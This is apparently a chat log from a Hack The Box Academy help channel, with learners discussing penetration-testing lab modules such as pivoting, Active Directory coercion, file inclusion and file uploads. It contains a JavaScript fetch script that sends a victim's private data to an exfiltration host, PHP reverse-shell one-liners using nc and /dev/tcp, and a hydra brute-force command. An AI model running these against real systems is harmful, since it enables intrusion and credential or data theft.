What should I do?
There are troubleshooting tips on https://help.hackthebox.com/ related to the VPN
Hack The Box Help Center
already done still no reply
INCIDENT HANDLING PROCESS: During an investigation, we discovered a malicious file with an MD5 hash value of "b40f6b2c167239519fcfb2028ab2524a". How do we usually call such a hash value in investigations? Answer format: Abbreviation
IOC ABBREVIATION IS THE ANSWER BUT THE ANSWER IS NOT ACCEPTED
anyone help me
IOC should be accepted
I got the credential for svc_sql using kerberoasting, what is the best method to get the ip of this user so that i can login with evil-winrm
no, it's showing an error, i typed the answer: indicators of compromise
Could someone help me with this? @muted kindle
what to do stuck
netexec
did the switching routes work?
help me guys please
ioc
I don't know since I don't know the IP address of the final host.
My attempts at a ping sweep either result in a ton of hosts or nothing.
I tried a configuration of 172.16.5.0/24 for ligolo and 172.16.6.0/24 for ligolo2 as well.
My current issue lies with host discovery.
I've tried the ping sweep commands from the module along with some Nmap scans, but no solid result.
worked , thank you so much
I was able to discover the first pivot host with ping sweep, after running it twice, didn't catch it the first time.
so u have changed sessions to the second agent and started --tun ligolo2?
Then the nmap -sn the network address of the new interface should pick something out ?
Alright, I'll give the nmap -sn command a go again, last time it returned a bunch of hosts.
I have the " Target(s) are spawning..." for 10 minutes now - is there anything i can do besides, terminate, refresh and/or restart ?
whenever i boot up HTB it will just say Target(s) are spawning...
me too !! I can't get access to the machine, it is always spawning
I've been having the same issue since yesterday, I just keep refreshing, try to spawn the target, and if that doesn't work, then refresh and try again.
alright, thanks for the feedback
how will netexec give the ip
are you trying to find which box it can login to?
no, i got the svc_sql user's password using kerberoasting and i want to login to this user, but i dont know the ip
how to find the ip of this user
@muted kindle which routes should I add this time?
172.16.0.0/16 ligolo
172.16.6.0/24 ligolo2
or
172.16.5.0/24 ligolo
172.16.6.0/24 ligolo2
i'm not understanding something here
IP isn't tied to a user it's by machines
You need to check it against a list of IP to see which one it can login to
u ifconfig the agent
its IP and subnet mask
determine its network address, thats the route to add
These are the IP addresses I have, and if I follow what you said, it won't allow me to add a second route.
So if I've already added the route 172.16.0.0/24 on the tun ligolo, it won't allow me to add the same route on tun ligolo2.
are these all in the same subnet ?
Yeah, since the mask is 255.255.0.0 /16, they're in the same subnet, no? Cuz the network address will be 172.16.0.0 for both then?
hmm since theres no new subnet then theres no new routes
Yeah, so what would you suggest I do? Should I change the first route to be 172.16.5.0/24 and make the second route 172.16.6.0/24 or 172.16.0.0/16?
Side note: I've tried performing a ping sweep directly from pivot 2's CMD, but that gave no results.
Sorry cant see the module so idk what its trying to get you to do
But if pc1 and pc2 in same subnet, pc2 has no new network interface, an agent is only needed on pc1
so there is only one route 172.../16 through ligolo
Basically, it's trying to get me to double pivot. Pc2 (or pivot2) does have a new interface (IP address in the diagram).
it's strange because they all fall under the same network
Does the module want you to use other tools?
I spoke with Xre0uS about this yesterday and he said the reason I prolly have to pivot is cuz of other things that may be segmenting the network.
Yeah, it does, but I'm tryna do it with ligolo.
Well, it's skills assessment so it hasn't mentioned which tools to use, but I assume they expect me to use tools from the module.
I've no idea how to work with this then, because if you add 2 routes it might get confused which interface a packet goes to because both are the same network
Perhaps ask him again later
Alrighty, thanks.
U still need help with that? you removed the message
Ahh, was having issues, had to delete the message and then it got sent.
Discord being a little whacky, but yeah, I still need help with the host discovery.
Hi can I dm you? I am fighting with the same monster D:
Yeah, sure.
try having only one route
then nmap -sn 172.16.0.0/16 but thats gonna take a while
unless u write a bash command to ping with only 1 packet
Alrighty, I'll give it a go.
When u tried doing it from inside pivot2 u scann the 172.16.6.1 - 172.16.6.254 ?
Yes
@muted kindle I just checked Xre0uS's ligolo tutorial that I've been learning from, it seems to be a similar situation in the tutorial. He changed the /16 to /24 so he did 172.16.5.0/24 on dev ligolo and 172.16.6.0/24 on ligolo2. I'll give that a go and let you know.
why can I not switch vpn servers
tbh I usually just use /24 for the ip routes
at least for htb modules you can assume it's always /24
Oh. You got any idea about how to deal with the situation I'm having rn? ^
if it's irl check with their networking guy
I'm now anxious about the kind of situation I'm having now showing up on the exam
just set it to /24
Still the same after refreshing?
It confuses me too for the /16
I'm doing it now, here's praying ping sweep works from pivot2
it should be able to reach in theory but you don't really know whats behind the scenes
just be able to adapt ig, if something doesn't work, switch things around and use the things that do
yep
What about if you spawn it from a different module?
Btw does ligolo get messed up if I change the routing table after I've already started a tunnel, shouldn't right?
remove the old one, it will take precedence
Done π
@next bronze @muted kindle I followed what Xre0uS said and added the routes. When I run the ping sweep tho, I get a TON of output
can't say that I've had that happen to me before
yeh ligolo never showed me that
go to the pivot2 run the ping sweep from it again
Funnily enough tho, when I run it from the CMD on pivot2, I only get a few ping replies, from the hosts .25, .35, and .45
for /L %i in (1 1 254) do ping 172.16.6.%i -n 1 -w 100 | find "Reply"
I'd probably restart the proxy and agents
Like reconnect everything? I've done it already before, this is prolly my third time? It's always the same output
yeah then I'm not sure, never seen this before
I'm gonna be so dead on the CPTS exam when it comes to host discovery
don't use ping
What other options I got? ARP ping?
scan select ports with nmap
Oh, like top 10 ports you mean for the entire subnet?
sudo nmap --top-ports=10 172.16.0.0/16
So something like that ^ ?
And use the -Pn as well, right?
yeah do /24
So by doing that I'm basically making an assumption that the host will be on that part of the subnet, yeah?
Since the second interface has the X.X.6.X
And what about this? It's needed, right?
Tbh I use it in all my scans. It's supposed to disable ICMP echo iirc.
yes to both
Alrighty, thanks.
So the command would be like this?
sudo nmap -F -Pn -n 172.16.6.0/24
yeah that should work
Best I first run the ping sweep from the actual host itself tho, then I'll resort to this command.
Thanks for your help, both of you.
oops forgot to reply to you here, try another esc and coercer should work, make sure you gave it the credentials
I tried ESC11 but I still don't get any hits on my certipy listener.....
what are you targeting
I'm trying to compromise dev01
did you try multiple endpoints with coercer
yes I keep getting RPC_S_ACCESS_DENIED in the coercer output
is it possible that the DC was patched and I can no longer coercer it?
are you trying to target the dc or dev01?
the DC, let me try dev01
if you can esc11 the dc right away then what are the other questions for 
hi everyone
I'm stuck with this question " Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer." about the ORACLE TNS module.
Check the server is up / you are connected to VPN / it's the correct IP
y0 y0 amigos. I found the answer to my own question. This time it is just the internal server and localhost, thus 2 times html encoding. But i thought that the internal server was only accessible through the first server. Anyways, it's something along these lines hahahah
Hey folks, i'm prepping for the cpts and i'm going back to the modules for a revision. If i re-do all of the skills assessments with no issues, i should be well revised for the cpts, right? Or should i re-do all of the exercises too?
Do the skills assessments cover everything or should i go back to the exercises?
it says 1 indicates 'remote server' and '0' indicates linked server, so are these two linked server? isnt a linked server supposed to be remote, im confused
Hey guys I'm currently doing the Windows Privilege Escalation module and there is a question "What executable other than cmd.exe is blocked by AppLocker? " and I can't seem to find the solution to this question
A remote server is not the same as a linked server. Linked servers are typically configured to enable the database engine to execute a Transact-SQL statement that includes tables in another instance of SQL Server, or another database product such as Oracle.
This means that a linked server could just be another database server instance running on the same machine.
what about a remote server? is it another database server instance that can be accessed remotely?
Accessed remotely, I'm not 100% sure about this tho.
why does the query retrieve a remote server?
The query actually retrieves the contents of the table sysservers which I'm assuming contains remote and linked servers.
oh right, isremote and srvname tables
No, they're column names.
right, *columns
what is a transact sql statement
It's Microsoft's extension to SQL.
oh okay, thank you :))
Hi, I'm working on the windows fundamentals module and I can't seem to rdp into the box
i am connected to the vpn and see the box on a scan
any ideas?
What is the error
it just says can't connect, i sent you a screenshot
Ur pic is so large my phone is struggling to load it damn
lol sry
what module and section
CORS Misconfigurations in advanced csrf and xss
the code provided in the module worked for me
fetch doesnt work?
your code isn't doing anything with the fetch first of all
second i don't know programming well enough to know if all the works together, i know what the module provided worked
your code misses a lot, like exporting the data somewhere, using javascript base64 encoding, etc
try using the code in the module you may have better luck
you need to exfiltrate to the exfiltration server
i was testing locally
In 'Active Subdomain Enumeration' the last question was "Submit the number of all "A" records from all zones as the answer."
I got the answer by manually checking and counting them, was there a way to do this with a tool that I am not aware of or is this the intended method ?
This is intended, I believe however, that dig tells you how many records were retrieved
Or you can do some regex filtering and pass it to wc -l
<!DOCTYPE html>
<html>
<body>
<script>
  fetch("https://vulnerablesite.htb:51154/profile.php", {
    credentials: 'include'
  })
    .then(res => res.text())
    .then(text => {
      const parser = new DOMParser();
      const doc = parser.parseFromString(text, 'text/html');
      const element = doc.getElementById('private-message');
      window.location = 'https://exfiltrate.htb:51154/?data=' + btoa(element.innerHTML);
    })
    .catch(err => console.error('Error:', err));
</script>
</body>
</html>
will this script work for csrf
the module used xml request, i wanna try fetch
Why not try it and see
Yeah it does, I just subtracted the non A records from the result.
;; XFR size: [redacted] records (messages 1, bytes 594)
Playing with Regex is beyond my skill/knowledge atm.
Regex is a basic thing shown in the Linux Fundamentals module
grep -e "\sA\s" try passing your dig through this
Thanks will check that out, I did all my Linux stuff on THM and that wasn't covered iirc
If it's not -e it's -E
it somehow worked on remote and doesnt work locally
maybe because of browser difference
Nah it works, still need to add them up manually but this will be good to know if I need to filter out a huge list at some point. Thanks !
There's a math function (which is bash scripting) {{ $(command 1) + $(command 2) }}
I can pipe it into wc -l and it works, Very cool!
Is there a way to see responses to your posts in erratum? Mine seem to disappear (I have one open but am missing a few)
Heyy :)), I'm on the Getting Started module of the Penetration Tester Path, on the Public Exploits part, and I am having trouble finding the right exploit to utilize on the target at the end. I did my enumeration and found an exploitable apache server and a Wordpress plugin (which also seems exploitable), but after trying some exploits I can't seem to find one that fits. What can I do to help me choose the right exploit?
You have to do something else before being able to use an exploit (at least for the route I took)
If that's too subtle (it kind of is) -> some exploits don't work when you're ||unauthenticated||
i am doing Skills Assessment - File Inclusion. now i know %00 works and "../../" can be detected and url encode doesn't work . any hints ?
mmmmmmm I seee, I ran into that in some of them
I thought that these initial machines would be done only using mostly things learned on that part, but that makes a lot more sense, ty once again :))
Yes, it's kind of surprising, but a lot of HTB content requires you to go further than just applying what you learned (in comparison to tryhackme for example)
Yeah, I've only done a few machines in tryhackme that's why i was used to more linear machines, but this is way better imo
I have a question regarding the Using Metasploit Framework module, section Session & Jobs, last question. After exploiting the vulnerability with metasploit, I tried the manual exploit too for practice. But no matter what I did I could not get it to work. It seems that it only works if you compile the C exploit on the target itself. But the question is, if I don't have gcc, does that mean manual exploitation is out of the way, with metasploit being the only option?
If a mod closes it/sets to read only they "disappear"
The right exploit is one that lets you read sometimes
Oh btw, I realised the Public Exploits part is another exercise (but keep in mind what I said for later), in that case you can do it unauthenticated. In that case I'm a bit surprised that you're struggling because it's straightforward:
- when you go on the home page, the first thing you can read is "Plugin Simple Backup 2.7.10 for Wordpress"
- if you use exploit-db.com or searchsploit, you'll only have one result when searching for WordPress Plugin Simple Backup (you don't even have to search for a specific version)
Bruhhh ahahaha, it didn't even occur to me that that could be an exploit, I should've researched that, tyty
I've got it now ahaha, tyty
It's that simple
Often you need to log in as an administrator to see plug-ins but since this is a getting started thing, it's not that deep
So the idea is that these types of plug-ins are hidden in a way, or they need authentication to be accessed?
Well no
It's that plug-ins are managed by web admins usually
You're not often gonna see the plugin version in your face
Usually because threat actors can use versions as a way to find exploits
I seee, so the key in this exercise was the plugin part, the fact that it was a plugin of WordPress isn't important, nor was the version of the WordPress?
Probably just worth noting that in the future modules you will do, that when you need to answer question you will already have covered the method to obtain the answer.
But you might need to use the info that you learned in a different way.
That makes sense, ty very much for the explanations
Okay π
damm academy just got a lot better
what happened?
Then today I learned that I took an alternative path for the ||last exercise of the getting started path||
What I did was ||crawling the files on the server, finding one with the user hash, cracking the hash (the password is very weak), login with the user credentials, uploading a webshell||
When the intended path only needed|| the right exploit and a valid username||
Both valid
No, usually you can compile the code on another system that closely resembles the one you're trying to exploit (same distribution, version, version of libc, ...) and transfer the binary.
You can always look at the metasploit code for the module to check how they do it
for some reason powershell is giving me this error when I try to transfer a file. I just got back to doing HTB Academy today for first time in a while and I'm sure my head is hazy. Is there something I'm not understanding from the module? This is for Windows File Transfers section of File Transfers module.
For the Shells & Payloads, the exercise in the Payloads section indicates to set the smb share variable SHARE to ADMIN$, however that variable is not present in the msf module. I cannot run the exploit.
It seems like the smb version for pwnbox is causing an issue though.
you mean translating the code to another language that is available on the target system? btw I tried compiling it on my machine as I said but it does not work when transferred
no, just compiling using the same or similar gcc version from another machine
apologies if I don't quite get it. Compile locally then transfer it ?
yes, with the same or similar gcc version
yeah tried that it gave back some missing library error
yes, hence the point with the same or similar gcc version
hmmm, not something I considered, so I should somehow find out what version of gcc they used in the github poc
and downgrade/upgrade to the same version
then compile it
no, so you find out what glibc version are available on the target, then use the right gcc to compile it
you can't really downgrade it, that's why the original suggestion was to use "another system that closely resembles the one you're trying to exploit"
ok so these would be the steps?
1. find out the available glibc version on the target
2. set up a VM with the same glibc version and compile the C exploit there
3. transfer the exploit to the target
are you using the right exploit?
correct, generally older versions will be compatible with new versions but not the other way around
alright, thanks a bunch for the help
feels like there should be a dedicated module for this C stuff too
yes its the windows smbexec exploit. Its weird. The specific error is :
peer_native_os is only available with SMB1 (current version: SMB3)
I'm hung up on this right now trying to work out why it isn't working properly, it's just supposed to be following through the module but I have this unexpected issue.
check the exploit you're using
have you tried to reboot msfconsole or your VM ? sometimes that does the trick for me when metasploit throws up errors
Thanks lol wow I was going deep into it I for real overlooked to use psexec instead of webexec
I was about to run the exploit manually cause I thought the config within msf was wrong lol
do all of that before triple checking im using the right exploit smh lol. thanks though I appreciate it
Look at the exploit names, yours is different from theirs
Thanks Marcie, I got it figured out ^. *Facepalm
Anyone have any actionable advice on feeling overwhelmed at how much information the whole PTJR path has? Like note taking/report writing guidance? It just seems like it's so much, and I'm not even halfway through. Specifically in preparation for the CPTS exam.
PTJR?
Penetration Tester Job Role.
Just say pentester path or cpts path
chunk your workload into digestible segments
guys does the cpts path provide some stuff that can be put on linkedin (apart from the cpts cert)
no
no grind it all within 30 hours and forget everything
I try, but I have a tendency to make things unnecessarily difficult. I'm using Obsidian, and make an effort to name the "digestible sections" based on their target environment context. It mostly works, but I'm almost through AD Attacks & Enum, and my face feels like it's melting.
take your time with it, AD is a huge topic and a lot of things can be overwhelming at first
you'll get better as time goes on and you practice more
Thanks for the encouragement. I also lack patience with myself, so taking my time takes effort. I've been thinking about splitting sessions between the modules and relevant boxes on the main platform. All while documenting and even writing actual reports once that module is done.
However, I feel like I don't have time to take. I'm not getting any younger, and however talented and disciplined I may be, it seems like such a tall mountain, with a dozen or so false summits.
You're implementing walls where ladders exist
Sure it's a tall mountain, but you tackle it a time
You're not expected to be an expert at the end
Just competent
The exam itself tests two things: your ability to do the work, and your understanding of the domain
That seems to be a common theme in my life. My coming to you all for advice is in direct confrontation of that element of my brain. The two words "Just competent" and your following message actually do feel like the chill pill I needed.
In other words, "Noob needs a chill pill."
You're trying to achieve perfection when a later module might trivialize the basics
Thank you for that! I've self-witnessed it in the modules. I see how it builds and drives you to performing steps that call on prior modules and how prior modules seem trivial as the concepts get more towards targeting a whole network.
They are building blocks
there's also no one way/thing to get there right away, field field is all about constantly learning and improving
Field field 
Sup all? Starting the modules over, this time taking notes on every module page. Anyone that has tips on how to take notes or organize them? Curious to see how others do it
Hi, in the "Footprinting SNMP" module on the "Pentester" path, could anyone please help me understand how it's best to approach the last question? I understand that I need to use snmpwalk in conjunction with grep to locate the script in the wall of text that is snmpwalk's output, but I'm not really sure how to approach this as I have no idea what that script might be called. I'm looking to better understand how to approach these scenarios as opposed to someone just flat out giving me the answer if possible.
Hey, I'm taking notes on everything in the modules - from techniques, to tools used, to generic explanations. Feel free to DM me if you want to check out what I've done with regards to note-taking.
I use obsidian, I make folders for tools every time they're used and I make a quick explanation to myself of what they were used for. I also write what I call "Attack Narratives" of whatever the exercise is at the end of the lesson, that really amounts to just notes of me talking to myself lol, but it seems to help.
What type of file would a script be? I pasted the output into another application and used the search function.
I'm not sure I fully understand what you're implying, as the flag I found had no extension that would suggest it's a script.
To be clear, I know what the answer is - just looking for insights on how to tackle these situations better in the future without reading through massive textual output
common script file extensions maybe, like .sh, .py
@cerulean grail ||Well... You know that it is a Linux system, which is likely to use a script that will run from a .sh file. You can just paste the output into subl and use ctrl+f for .sh ||
Hello everyone, what's the appropriate way to ask for guidance on a module?
module name, section name, question or text snippet, your current understanding of what is being asked/told, what you have attempted to solve the question if any
is that string from the module
Yes, the flag isn't far away from where you find this.
you may want to omit that
Done
For NTLM Relay Attacks - Skills Assessment, the second question/task is to compromise the BACKUP01 server. My understanding is below, but I'm stuck on moving forward
||I have used the mozhar account via ntlmrelay/responder to get smb access to the backup01 server, but couldn't write files and didn't see anything that helped so far. I have the sql_ftp_test account which provides me domain access, but I seem to be unable to coerce any auth with coercer/printerbug/petitpotam/etc, and unable to drop files anywhere. Noticed signing is disabled but not picking up any meaningful auths without coercion either||
check the shares you can access with all the creds that you have
Am I wrong in thinking I only have one set of creds? Other than ||mozhar on the backup server||?
I didn't see any read or write access to anything other than with the relayed creds
is that for the second question?
Yea
what if you relay what you have to do something with ldap, then use that for your next step
|| Create a computer account? I guess I'm unsure what I would use it for. Or do you mean enroll in a cert?||
the former, then try to coerce with that
Understanding that you're providing the guidance, I'll take your word for it. But in what scenario would someone encounter that? I don't think I've ever seen these types of coercion issues irl where you can relay with a computer account but not a standard user
The accepted answer has no extension.
you're not relaying, you're coercing. different types of accounts might have different access
Is it possible for a module (AD Enumeration & attacks) to use other 10.x.x.x IPs, when they are not listed next to "Target(s)"?
I've still never seen that irl. With relaying, sure. But coercing, never seen specific accounts denied printerbug/petitpotam while others work haha
maybe it's set up so that the original account doesn't have rights to interact with the target
Ahh very nice! I will start adding that attack narrative too. Awesome idea
thanks for the tip
I had trouble pinging the other hosts in that network. The best and fastest way I found to scan the networks was by installing nmap on the PIVOT-SRV01 Windows host, and scanning from there.
Eventually, I was able to get the pings to work, by changing to a different Academy server, and sending multiple pings. It took a while, but at least it worked:
0..255 | % {"172.16.5.$($_): $(Test-Connection -Count 3 -Delay 2 -ComputerName 172.16.5.$($_) -Quiet)"}
0..255 | % {"172.16.6.$($_): $(Test-Connection -Count 3 -Delay 2 -ComputerName 172.16.6.$($_) -Quiet)"}
Yaaas I was able to solve the skill assessment, but I am trying to extend the tunnel to the other subnet too, so I can access it from my attacker machine
Like, I was able to get all flags but the phrasing of the questions actually hint a lot. Did not get a proper pivot from my attack host to the .6 network
I see what you mean. It didn't seem like I used a lot of the techniques from the coursework: a couple of SSL local port forwards (one for RDP, one for SMB), and an SSL dynamic port forward to use with proxychains for an nmap scan. Mostly it was just SSHing to the Linux machine and the initial Windows pivot machine, some RDP access with xfreerdp and mstsc, and PSRemoting into the DC. I'm getting ready to go back and see how many of the course techniques I can apply.
Ok so for anyone who is doing the Skills Assessment for Security Monitoring & SIEM Fundamentals, please note that the correct Service Account convention is svc- and not -svc. I know it's a bit confusing. I overthought the content that was written here
If you go through kibana and do a wildcard search on svc, you'll find the correct naming convention yourself to confirm
The naming convention written down by hack the box team is incorrect
Please help
Module: Web proxies
Section: Proxying tools
Module options (auxiliary/scanner/http/http_put):
Name Current Setting Required Description
ACTION PUT yes PUT or DELETE
FILEDATA aksika no The data to upload into the file
FILENAME x yes The file to attempt to write or delete
PATH / yes The path to attempt to write or delete
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 185.15.59.224 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
PUT Upload local file
msf6 auxiliary(scanner/http/http_put) > run
[-] 185.15.59.224: File doesn't seem to exist. The upload probably failed
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
the request goes via burp as needed as in the screenshot, but what is the flag I need to look for?? the hint says something starts with msf
I tried it with the msf built-in proxy and with proxychains, but no idea what kind of answer is needed here
never mind, I solved it - such an idiotic review question! Wasted 2 hours of my life!!
the answer is the content of the FILEDATA
but do not modify it just keep the original value "msf xxxx xxxx"
So I'm working on Blacklist Filters in File Upload Attacks and looking for a hint. I'm able to successfully upload my php payload using Burp ||(php4, phtml, phtm) || (extensions haven't always persisted through resets or new servers).
When I'm running a curl command or going to the URL of my uploaded file, it results in showing me the string of my payload instead of running my command at the end of the URL string. Any suggestions?
Using Repeater to upload the file btw
you need to find a way to execute the payload, find a different directory - if I understood your problem correctly
Good thought process but I am executing from the proper directory for my file...I can view the path from the page source
the issue is that when i execute a webshell command from the browser or using a curl command, the output is the web shell command string instead of the command i'm trying to run
try to make RCE first so hardcode a command first and then run the webshell
hi everyone, I have a problem in the module Windows Attacks & Defense
with the PKI - ESC1 exercises
I cannot connect to the WS001 machine through RDP
I got this message: "the trust relationship between this workstation and the primary domain failed"
try another vpn server
okay i cannot connect to this reverse shell to save my life and i have come to the conclusion that for some reason netcat is not working on the target machine. it's a PHP remote code execution. everything else i've tried works just fine, like i'll type something like grep --help and it will print the help manual for grep but nc -h returns nothing. man nc works, but that's it. any other netcat commands return nothing. based on the man page it looks like it's a super outdated version. -c and -e both don't work so it recommends using mkfifo. which doesn't work.
here's the one liner i've been trying:
<?php system("rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.34 9941 > /tmp/f"); ?>
i have changed many many things and none of them work.
also i know netcat is working on my machine because i can connect to myself
have you tried which nc, which netcat, which ncat
time to think of a different way then
do you connect to every method of reverse shell using netcat
idk how to get a reverse shell in any other way
netcat is preferred and easiest but maybe it doesn't work sometimes
you can try looking for other installed programs that you can leverage to get a reverse shell -> https://revshells.com
or you can craft a msfvenom meterpreter binary, upload it, then execute it
alright i'll keep looking, thanks
the only reason i've been trying netcat and not anything else is because the module specifically says to use netcat and even gives the command i'm supposed to use, which doesn't work
here's one you can try
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.34/9941 0>&1'");
yeah i've tried that one and a few others already
Dat shell...
took the easy way out
avoided the reverse shell altogether by just having the php script print the flag
:(
I am on the "footprinting" module on the DNS section on the last question "What is the FQDN of the host where the last octet ends with "x.x.x.203"?" I was able to get a subdomain from a zone transfer I performed another zone transfer on the only subdomain that would allow it. I am still coming up short. I also tried brute forcing it with the topmillion subdomains wordlist. any hints?
You should try other short lists in the same directory (this one is tricky)
metasploit isn't even working what the hell is this
i'm just going to try this machine tomorrow
thank you. I got it
hello everyone, I have a problem in the module Windows Attacks & Defense with the PKI - ESC1 exercises. When I try to build my TGT ticket I got this error: KDC_ERR_PADATA_TYPE_NOSUPP
Is it due to network issues or because I made a mistake during the certificate creation?
Currently stuck on this, can I dm?
Can anyone help me with my gmail account?
I forgor password like a retarted
I have proof it's my gmail
you'll need to reach out to Google for help with that, no one here works for Google so no one here can help you
why ask us?
What command are you using
Hey y'all I need some help, I don't know if I am attacking the question wrong. I am on the Linux Fundamentals course, specifically "Filtering Contents". The first question is just stumping me and I cannot seem to find the correct answer. I have done multiple combinations of ss & netstat such as netstat | grep -Ev '127.0.0.1|::1' or ss -tuln | grep '0\.0\.0\.0' | grep -v '127\.0\.0\.1' | wc -l and I am just stumped. If someone could help me out I would appreciate it
i haven't done that, but i find a great resource for command syntax is asking chatgpt
I have tried that path as well, nothing is coming up with the correct answer.
Is there a VPN outage/status page for the various Dedicated servers?
idk it was driving me nuts earlier
VPN going out at least. Could have been just my config tho
try choosing a different location
Not getting that option. Only lists US Dedicated 13.
Hi there, i may be being the biggest idiot in the world here, but where is hackman.exe file in the Game Hacking Fundamentals module?
haven't done that module but i've only ever seen tools in the c:\tools folder or the downloads folder for the user you login as
check c:\tools
So the module asks that I set up cheat engine, which I have done in my own VM. I downloaded their specific version of cheatengine that's bundled with the module, but the executable is nowhere to be found. Edit: it's probably somewhere really obvious, but i just can't see it.
The module does not have a pwnbox or VM to SSH into for the exercises.
not sure then sorry. sometimes there's a resources area in the module above the table of contents
I'm an idiot. I found it. The download button is right next to the exercise question at the bottom of the page
Targets are no longer spawning, just in a loop. Anyone else finding this? Status page unhelpful
Anyone else having problems with connecting to labs?
I can get pwnbox but not targets.
Seems to be working correctly again
Skills Assessment - File Inclusion. I can see the source code of index.php using php://filter. I know that ".." can't show up in the payload and payloads get a ".php" suffix added. The PHP version is 7.3.22, so the bypasses taught in this module won't work. I don't know what to do. Any hints pls?
I'm trying to install inveigh.exe from https://github.com/Kevin-Robertson/Inveigh/releases/tag/v2.0.10 but I can't get the binary at all pls
idk which one it is
dm i got it i think my head
I'm still down here.
Is it normal for this command to take two hours?
hydra -l (spoiler prevention)@inlanefreight.htb -P rockyou.txt -t 64 -f 10.129.203.7 smtp
it depends on latency
DM
If it worked you would have gotten a message saying where it saved to
Make sure you double check all the options
well I changed FILEPATH to /flag.txt along with targeturi
because I thought that would help.
That's where you fucked up
You didn't need to change the URI
Just the filepath
I'd just close msfconsole. And reopen it and rerun the exploit only changing the RHOST and filepath
I don't believe this is a public docker instance so you shouldn't have to specify the port, but if it is you'll need to specify RPORT
RHOST is strictly IP
RPORT is strictly port
I got it now, but I'm confused if its in msf or saved to the document.
computer*
Because that's a file, not a directory
Try using cat instead of cd
Also cd home isn't a thing it's either cd or cd ~
As you can see what that filepath was ends in .txt
I knew that, but I'm used to having to go to the path first like in windows.
I suggest taking the linux fundamentals course
I did, just forgot it.
cd home isn't a thing in windows either
I'll do a refresher.
it's cd ..
(Hint: it's why a lot of LFI vulnerabilities do ../../../../)
also I know that /* is just another fancy way of searching everything.
Cd can also just be used with the full directory path
Guys, I am doing the Attacking Common Services lab and now that I found creds, I need to connect to mysql, but I just can't connect
$ mysql -u (not spoiling)@inlanefreight.htb -h 10.129.203.7 -p
Enter password:
ERROR 2002 (HY000): Can't connect to MySQL server on '10.129.203.7' (115)
cd /home/user/.msf4/loot/ would take you there from anywhere
Am i doing something wrong with the command?
If you wanted to go to the /home/ directory, you needed use the leading/
Try not including the domain
Thanks, I got it, I had to specify the port of mysql
That shouldn't need to be done
So it's asking me to SSH as user1 but it's having a problem identifying that user
ssh username@server -p Port
Or it's -P
Oh no it's -p as shown in the question
Give it a minute
Also double check your ip
You put 99.x.x.x instead of 94.x.x.x
I noticed when you said check your ip
Always take a minute to actually read
always that one character messing things up
ssh is one of the most well used tools in academy, knowing syntax is important
Also I think most sections show basic syntax
Rdp
huh.. I read WinRM somewhere
any one can help me ? Skills Assessment - File Inclusion
i wrote the php code in the log but it won't run my command
It's also a tool, yes
Check the quotation marks, see how the log is structured and think about what happens if you write your payload in there
password crack module is crazy.
?
Ah
take a minute to try working it out before rushing here
man <command> is very helpful for understanding a command
Or <command> -h/--help
it's like the server doesn't log any more
no matter how many requests I send, the access.log won't grow
Then reset the target
log poisoning has the potential to break the server
i have reset a couple of times
Then your payload must be wrong in some way
Because you have broken your log.
Restart the server and take a close look at the log file. Then think about which quotation marks you can use.
I deleted your post because it contains a lot of spoilers
